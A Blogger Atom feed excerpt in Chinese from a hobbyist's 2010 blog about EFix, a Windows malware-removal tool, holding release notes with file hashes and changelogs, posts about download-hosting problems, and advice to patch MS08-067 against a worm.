type='html'>版本：5.6 20100708.02&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1570025 bytes&lt;br /&gt;MD5...: 3d11a48868b64c45ece781bcb25a866d&lt;br /&gt;SHA1..: c7ef72d35492c9c2774c22d42cde9e85d63d73f5&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows 7 x86中文旗艦版&lt;br /&gt;Windows XP SP3 中文版&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修正因中文字元造成無法讀取啟動和桌面資料夾位置的問題&lt;br /&gt;新增刪除檔案&lt;br /&gt;自動更新讀取檔案時間拉長看自動更新是否能夠撐住。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;備註：&lt;br /&gt;還是沒改完...而且開始考慮有沒有那個需要去做大修改&lt;br /&gt;因為測試過後檔案起碼增加400k...這樣光整包就快2M.&lt;br /&gt;然而也只是增加了一些迴避以及避免被人看到源碼而已..這不是我的作風&lt;br /&gt;所以就在考慮是否是真的要做大改嗎....?&lt;br /&gt;在想看看好了.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4878907243384110672?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4878907243384110672'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4878907243384110672'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/efix-56-2010070802.html' title='EFix 5.6 20100708.02'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-2346304351754798299</id><published>2010-07-05T21:33:00.000+08:00</published><updated>2010-07-05T21:33:53.489+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>自動更新...0rz</title><content type='html'>還是依樣老問題，GOOGLE空間也爆啦XD&lt;br /&gt;三個分流都不行.....0rz&lt;br /&gt;&lt;br /&gt;這樣也都不行那我看大概也生出不空間來做處理了...0rz&lt;br /&gt;這邊會在改版將下載時間拉長看看效果如何。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-2346304351754798299?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2346304351754798299'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2346304351754798299'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/0rz_05.html' title='自動更新...0rz'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4637045992251779659</id><published>2010-07-05T21:05:00.000+08:00</published><updated>2010-07-05T21:05:44.752+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.6 20100705.04</title><content type='html'>版本： 5.6 20100705.04&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1493220 bytes&lt;br /&gt;MD5...: 70da900e6f08782a70ab0579ec78d797&lt;br /&gt;SHA1..: 7e0dc93f7eece58173fdcd9b29478984a1745e0b&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 x86&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修正0703版的刪除檔案列表BUG&lt;br /&gt;移除第三方工具REG.EXE&lt;br /&gt;新增第三方工具SWREG.EXE&lt;br /&gt;修改部分批次結構.&lt;br /&gt;修改GUI自動執行選項功能，原本的關閉開啟自動執行功能取消，只留微軟方案.&lt;br /&gt;因為測試後不穩定因素太多所以先去除掉。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;備註1：&lt;br /&gt;基本上還沒改好...&lt;br /&gt;不過因為0703版的BUG所以必須要先放出來沒辦法。&lt;br /&gt;&lt;br /&gt;備註2：&lt;br /&gt;SWREG這次是偷偷放上去...隨時有可能會又改回5.5版...0rz&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4637045992251779659?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4637045992251779659'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4637045992251779659'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/efix-56-2010070504.html' title='EFix 5.6 20100705.04'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-588779157011581454</id><published>2010-07-03T17:30:00.000+08:00</published><updated>2010-07-03T17:30:47.964+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.5 20100703.07</title><content type='html'>版本：20100703.07&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1241507 bytes&lt;br /&gt;MD5...: aa619367d26d557188b72f0e75cbcfa1&lt;br /&gt;SHA1..: e69eb5ccd6d614779ab02d64a693a1c28fbad1c2&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows 7 X86旗艦版&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;新增刪除檔案&lt;br /&gt;修改內部部分批次結構.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;備註：&lt;br /&gt;這一版其實是不小心放上去的...東西還沒改完&lt;br /&gt;不過既然已經放了就算了先放上來也好，剛好有加到比較新一點的惡意程式.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-588779157011581454?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/588779157011581454'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/588779157011581454'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/efix-55-2010070307.html' title='EFix 5.5 20100703.07'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-8882722564903363851</id><published>2010-07-01T21:37:00.000+08:00</published><updated>2010-07-01T21:37:20.741+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><title type='text'>碎碎念...最近改的真累0rz</title><content type='html'>由於發現之前會針對efix進行攻擊抵制的病毒有偷偷改版，同樣會對efix進行攻擊。&lt;br /&gt;所以目前都先將重點放在迴避上面&lt;br /&gt;&lt;br /&gt;只是改起來很辛苦....0rz&lt;br /&gt;為了這個我還特別寫一個自動化的假編譯工具XD ( 用AUTOIT幫我每次打包的時候都做一些變化 )&lt;br /&gt;只是後來發現似乎不只只有抓那一點東西進行攻擊&lt;br /&gt;所以現在就在進行大改...&lt;br /&gt;如果改好了原本的弱點會消失並且不是很好破 ( 預計啦 )&lt;br /&gt;但.......真的很複雜0rz&lt;br /&gt;&lt;br /&gt;原本寫的腳本編譯法要全部重寫..並且也要另外再包工具進去，檔案會變更大.&lt;br /&gt;不過沒辦法這是趨勢，以後有機會的話我也想將SWREG放回去，不然一直靠下載很麻煩.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-8882722564903363851?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8882722564903363851'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8882722564903363851'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/0rz.html' title='碎碎念...最近改的真累0rz'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-8290619089079559253</id><published>2010-06-25T21:18:00.001+08:00</published><updated>2010-06-25T21:21:19.771+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.5 20100625.10</title><content type='html'>版本：5.5 20100625.10&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1236547 bytes&lt;br /&gt;MD5...: ffea932646f1c7d1b7f7feb385d2f358&lt;br /&gt;SHA1..: d8f5633c68336b5ab362ab56cc605c3074e1f13c&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows 7 x86旗艦版&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;新增刪除檔案&lt;br /&gt;修改內部部分批次結構，看是否能解決一開始可能會出現的找不到檔案$%^這一類的訊息&lt;br /&gt;&lt;br /&gt;備註：&lt;br /&gt;看起來好像改不多東西...其實改超多的0rz&lt;br /&gt;像版本是2010年06月25日改，10表示我發佈測試版本發佈10次&lt;br /&gt;中間修改一大堆東西....0rz&lt;br /&gt;執行上是沒甚麼差別，但內部修改很多。&lt;br /&gt;不過不想說太多免得被惡意程式盯上&lt;br /&gt;主要會改那麼多主要是這樣改有助於版本發佈時可躲開惡意程式攻擊。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-8290619089079559253?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8290619089079559253'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8290619089079559253'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/06/efix-55-2010062510.html' title='EFix 5.5 20100625.10'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-6790284418655121471</id><published>2010-06-17T11:46:00.000+08:00</published><updated>2010-06-17T11:46:28.576+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.5 20100617.02</title><content type='html'>版本：5.5 20100617.02&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;MD5:&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;65dd9b24577cd85ee4f0140b447213b9&lt;br /&gt;SHA1:&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;fa9e145f91dfe33ad47b309ab940b21e5e6f59df&lt;br /&gt;SIZE:&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;1,224,622&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows 7 x86旗艦版&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修改REBOOT::腳本重新啟動後自訂腳本登錄值匯入的順序，避開打包工具REG.EXE的BUG&lt;br /&gt;增加刪除檔案&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-6790284418655121471?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6790284418655121471'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6790284418655121471'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/06/efix-55-2010061702.html' title='EFix 5.5 20100617.02'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1061204589057993718</id><published>2010-06-14T20:19:00.000+08:00</published><updated>2010-06-14T20:19:51.366+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>新增下載空間</title><content type='html'>咪的哩才兩天就掛了...真是有夠讚的XUITE&lt;br /&gt;重新放檔案到www.multiupload.com這邊&lt;br /&gt;還是免空...0rz&lt;br /&gt;沒辦法。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1061204589057993718?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1061204589057993718'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1061204589057993718'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/06/blog-post_14.html' title='新增下載空間'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-6160726130473168076</id><published>2010-06-13T00:24:00.000+08:00</published><updated>2010-06-13T00:24:26.209+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>有關空間</title><content type='html'>有人在問我為什麼程式一定堅持要放免空&lt;br /&gt;不放其他人提供的學網空間或GOOGLE SITE&lt;br /&gt;&lt;br /&gt;GOOGLE SITE其實以前有放過&lt;br /&gt;還一次放三個分流，結果就是到了晚上比較多人下載的時候&lt;br /&gt;就三個分流都爆...&lt;br /&gt;那時候一天連線人數還不超過1000人。&lt;br /&gt;現在大約是一天2000-3000人的流量&lt;br /&gt;以這流量來看我看不用說晚上啦。&lt;br /&gt;&lt;br /&gt;搞不好整天都下載不到東西...&lt;br /&gt;加上現在自動更新的檔案已經放在GOOGLE平台內了&lt;br /&gt;要是再放到GOOGLE那邊的話&lt;br /&gt;&lt;br /&gt;不用說主程式了&lt;br /&gt;我在處裡自訂腳本的時候也會出問題&lt;br /&gt;&lt;br /&gt;至於學網&lt;br /&gt;第一個我不是學生，就我個人原則學網是給學生用的&lt;br /&gt;不是給我這種人用的&lt;br /&gt;第二個是說難聽點，這東西其實還是有版權問題的....&lt;br /&gt;只是目前沒有人在反應而已&lt;br /&gt;要是有人因此這樣去追空間提供者提告還是幹嘛的&lt;br /&gt;那不就是無謂之災？&lt;br /&gt;&lt;br /&gt;所以很多人有提供學網空間我都拒絕了。&lt;br /&gt;基本上現在的版本新的連線架構已經做好了&lt;br /&gt;已經在做壓力測試&lt;br /&gt;希望是能夠撐住現在一天大約3000人左右的流量....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-6160726130473168076?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6160726130473168076'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6160726130473168076'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/06/blog-post.html' title='有關空間'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4323498266695798559</id><published>2010-06-11T11:19:00.000+08:00</published><updated>2010-06-11T11:19:02.068+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.5 20100611.07</title><content type='html'>版本：5.5 20100611.07&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1224659 bytes&lt;br /&gt;MD5 &amp;nbsp; : abca0c677609478873a4a9bc597073b4&lt;br /&gt;SHA1 &amp;nbsp;: 7079ebfea8a8cc162223f848105a074e43aadfe6&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 x86旗艦版&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;新增刪除檔案&lt;br /&gt;新增偵測WINLOGON\TASKMAN底下和AUTORUN.INF內檔案的關連，相同就會刪除&lt;br /&gt;強制移除%SYSTEMDRIVE%\AUTORUN.INF資料夾&lt;br /&gt;%SYSTEMDRIVE%為系統磁碟&lt;br /&gt;&lt;br /&gt;註：&lt;br /&gt;這一次放XUITE看看使用情形如何。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4323498266695798559?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4323498266695798559'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4323498266695798559'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/06/efix-55-2010061107.html' title='EFix 5.5 20100611.07'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4221823682314357334</id><published>2010-06-10T17:32:00.002+08:00</published><updated>2010-06-10T17:40:04.363+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>GFF6.EXE ?</title><content type='html'>這幾天比較常看到的是這樣&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;不過比較特別的是掃描報告裡面並不會看到甚麼特別異常的地方&lt;/div&gt;&lt;div&gt;一般描述都是描述連網路連一陣子不定時會出現&lt;/div&gt;&lt;div&gt;並且有可能有人會出現Generic Host Process for Win32 Services錯誤的情形&lt;br /&gt;&lt;br /&gt;我看到第一個想到的就是&lt;a href="http://www.microsoft.com/taiwan/technet/security/bulletin/MS08-067.mspx"&gt;MS08-067&lt;/a&gt;相關的東西&lt;br /&gt;不過並不敢確定是否為此微軟漏洞產生或者是有0-DAY攻擊出現&lt;br /&gt;&lt;br /&gt;然而就我觀察確實有喊中這東西的人相關的安全性更新都沒有補沒錯&lt;br /&gt;並且也沒有裝任何防火牆，內建的是否有開啟就不清楚。&lt;br /&gt;&lt;br /&gt;如果有碰到這檔案名稱的病毒者時&lt;br /&gt;請先將上面提到的&lt;a href="http://www.microsoft.com/taiwan/technet/security/bulletin/MS08-067.mspx"&gt;MS08-067&lt;/a&gt;漏洞先補起來，這個不管是不是正版都可以直接下載補&lt;br /&gt;假設說補了還是一樣，那請將您的防火牆開啟，假設沒有裝防火牆的人，也請將WINDOWS內建的防火牆開啟並且重新設置。&lt;br /&gt;&lt;br /&gt;這樣基本上就沒問題了。如果說沒有被打進系統的話...&lt;br /&gt;&lt;br /&gt;----------------------------------------------------&lt;br /&gt;這邊提醒各位，該裝的安全性更新還是要裝，如果真的是因為使用非正版軟體&lt;br /&gt;而造成沒辦法更新的話，也請最少將&lt;a href="http://www.microsoft.com/taiwan/technet/security/bulletin/MS08-067.mspx"&gt;MS08-067&lt;/a&gt;這一個裝起來。&lt;br /&gt;&lt;br /&gt;並且善用你的防火牆，不要因為會跳提示或者是妨礙到使用就將他關閉。&lt;br /&gt;那很危險的。&lt;br /&gt;&lt;br /&gt;註：WINDOWS 7不需要安裝此更新，就目前為止WIN7也沒碰到有中這東西的。&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4221823682314357334?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4221823682314357334'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4221823682314357334'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/06/gff6exe.html' title='GFF6.EXE ?'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-5998025786743100026</id><published>2010-06-04T18:00:00.000+08:00</published><updated>2010-06-04T18:00:43.096+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.5 20100604.01</title><content type='html'>版本：5.5 20100604.01&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1224423 bytes&lt;br /&gt;MD5...: 21eb15975f362f95c5c4d3d469c8157a&lt;br /&gt;SHA1..: 5ec67fca1f5f1a7a80b5349c4b8bf792335de02d&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows 7 X86旗艦版&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows XP SP2&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;增加VISTA的白名單&lt;br /&gt;增加清除部分系統檔案內文件流資訊。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-5998025786743100026?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5998025786743100026'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5998025786743100026'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/06/efix-55-2010060401.html' title='EFix 5.5 20100604.01'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-2070795507661171916</id><published>2010-05-31T11:27:00.000+08:00</published><updated>2010-05-31T11:27:21.627+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.5 20100531.04</title><content type='html'>版本：5.5 20100531.04&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1224186 bytes&lt;br /&gt;MD5...: fea11806150637043cbbd03c14c4a26f&lt;br /&gt;SHA1..: ff3f991e7b97c47859e047c973a7f52c78f4e7b8&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 X86旗艦版&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;強化IERESET::自訂腳本的修復能力&lt;br /&gt;新增自訂腳本REMOVEAUTORUN::&lt;br /&gt;用來清除&lt;span class="Apple-style-span" style="color: red;"&gt;AUTORUN.INF資料夾&lt;/span&gt;的&lt;br /&gt;系統分析列舉新增CLSID的COMMAND掃描&lt;br /&gt;並修改列舉方式.&lt;br /&gt;自動更新載點變更，不使用HINET免費空間。&lt;br /&gt;改用三個分流處裡看看是否能夠消化自動更新的流量&lt;br /&gt;&lt;br /&gt;備註：&lt;br /&gt;從此版起開始&lt;span class="Apple-style-span" style="color: red;"&gt;不支援WIN 2000&lt;/span&gt;了請WIN 2000使用者注意&lt;br /&gt;因為前幾天給公司SERVER跑了一次，雖然沒有甚麼太大問題&lt;br /&gt;但是也出現不少小問題。&lt;br /&gt;在手頭上沒有2000作業系統以及Win 2000已經過了產品維護周期&lt;br /&gt;所以此處也不對WIN 2000做支援了。&lt;br /&gt;還請使用者見諒.&lt;br /&gt;&lt;br /&gt;當然如果還是執意要用的話，是可以使用EFix的DEBUG模式去跑&lt;br /&gt;就可以跳過檢查程序，不過不建議.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-2070795507661171916?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2070795507661171916'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2070795507661171916'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/05/efix-55-2010053104.html' title='EFix 5.5 20100531.04'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-2065410370902623906</id><published>2010-05-29T21:25:00.000+08:00</published><updated>2010-05-29T21:25:17.791+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>CLSID真的他X的有夠複雜...</title><content type='html'>這兩天光為了瀏覽器綁架的問題測試版的EFix不知道改了多少次版&lt;br /&gt;每一次改成果都不滿意結果整段重寫...0rz&lt;br /&gt;問題就在CLSID上面&lt;br /&gt;太多了&lt;br /&gt;&lt;br /&gt;結果建立白名單或黑名單都不是&lt;br /&gt;同時也必須要想辦法去修復被刪除的正常CLSID數值&lt;br /&gt;然而有些數值每一種作業系統所表示的值都不一樣...&lt;br /&gt;手頭上有的作業系統也少&lt;br /&gt;只好暫時先從自己電腦上面有的去過濾&lt;br /&gt;&lt;br /&gt;結果就是測試發生一堆有的沒的問題0rz&lt;br /&gt;沒辦法....在寫法還沒定案之前暫時先不會管其他的東西.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-2065410370902623906?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2065410370902623906'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2065410370902623906'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/05/clsidx.html' title='CLSID真的他X的有夠複雜...'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1758632610942485027</id><published>2010-05-18T10:48:00.000+08:00</published><updated>2010-05-18T10:48:18.742+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>空間啊....0rz</title><content type='html'>剛剛發現到HINET的空間又被修改了0rz&lt;br /&gt;這樣子變成自動更新會失效...&lt;br /&gt;&lt;br /&gt;那可能就是暫時先請各位使用免空下載了。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1758632610942485027?l=reinfors.blogspot.com' alt='' 